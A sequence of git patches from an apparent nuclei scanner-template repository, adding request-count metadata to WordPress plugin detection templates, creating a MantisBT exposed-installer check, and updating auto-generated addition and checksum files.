index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 45afc0beab9ecfb97064f936b1968200da1e14c1 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 19 Sep 2023 16:55:14 +0530
Subject: [PATCH 0450/1090] Create mantisbt-installer.yaml

---
 .../installer/mantisbt-installer.yaml         | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/misconfiguration/installer/mantisbt-installer.yaml

diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml
new file mode 100644
index 0000000000..5a62dab438
--- /dev/null
+++ b/http/misconfiguration/installer/mantisbt-installer.yaml
@@ -0,0 +1,32 @@
+id: mantisbt-installer
+
+info:
+  name: MantisBT Installation Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"Administration - Installation - MantisBT"
+  tags: misconfig,mantisbt,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/install.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Administration - Installation - MantisBT"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From b852222354a03143594be93c46af76d007baa717 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 12:24:21 +0000
Subject: [PATCH 0451/1090] Auto Generated New Template Addition List [Tue Sep
 19 12:24:21 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index f0a943da34..007c3a3e50 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
 http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
+http/misconfiguration/installer/mantisbt-installer.yaml

From 501ac5f0a56e3990bbbbc457119f28c0fde43807 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 12:24:35 +0000
Subject: [PATCH 0452/1090] Auto Generated Templates Checksum [Tue Sep 19
 12:24:35 UTC 2023] :robot:

---
 templates-checksum.txt | 407 +++++++++++++++++++++--------------------
 1 file changed, 204 insertions(+), 203 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index d6a58511f6..7b31af2c70 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:a1e9432abfa90bc1b48c05fa1278519b055862dc
-cves.json-checksum.txt:7b5ad7d2d0751827d6679f426171b866ab275d0f
+cves.json:26f44f7581551d5cb38bd4dbe2b4941c1ca5a393
+cves.json-checksum.txt:218b03ae2bc08f5ac2450c051ca435c194fbb235
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -4504,6 +4504,7 @@ http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d801
 http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2
 http/misconfiguration/installer/magento-installer.yaml:c6e440e4873876f64c732177fcf84521d8677926
 http/misconfiguration/installer/magnolia-installer.yaml:6a646973b2b9be72f9eea240e61473bc76657138
+http/misconfiguration/installer/mantisbt-installer.yaml:3215c69a4ff74413a385cef6d5af6019c82b0978
 http/misconfiguration/installer/matomo-installer.yaml:11b8fc5a1e88dd75aedcacd4d062f84ec57b533d
 http/misconfiguration/installer/mautic-installer.yaml:27560145f4bac624acc11e51ab63162348de5beb
 http/misconfiguration/installer/mcloud-installer.yaml:8c1d60036ce1231c7fcb0ed69e47788209727f8a
@@ -5848,218 +5849,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
